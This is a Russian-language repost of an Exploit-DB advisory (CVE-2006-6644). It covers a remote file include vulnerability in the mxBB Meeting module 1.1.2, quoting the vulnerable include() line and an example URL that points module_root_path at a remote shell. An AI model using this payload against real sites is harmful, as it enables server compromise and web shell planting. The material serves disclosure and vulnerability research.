- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2941
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6644
- Дата публикации
- 2006-12-16
Код:
*******************************************************************************************
# Title : mxBB Module Meeting <= 1.1.2(meeting_constants.php) Remote File Include Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.mx-system.com
*******************************************************************************************
[[ERROR]]]------------------------------------------------------
....
..
include($module_root_path . 'language/lang_' . $language . '/lang_meeting.' . $phpEx);
....
..
[[ERROR]]]---------------------------------------------------------
Example:
//[path]/modules/mx_meeting/pages/meeting_constants.php?module_root_path=[shell]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-16]
- Источник
- www.exploit-db.com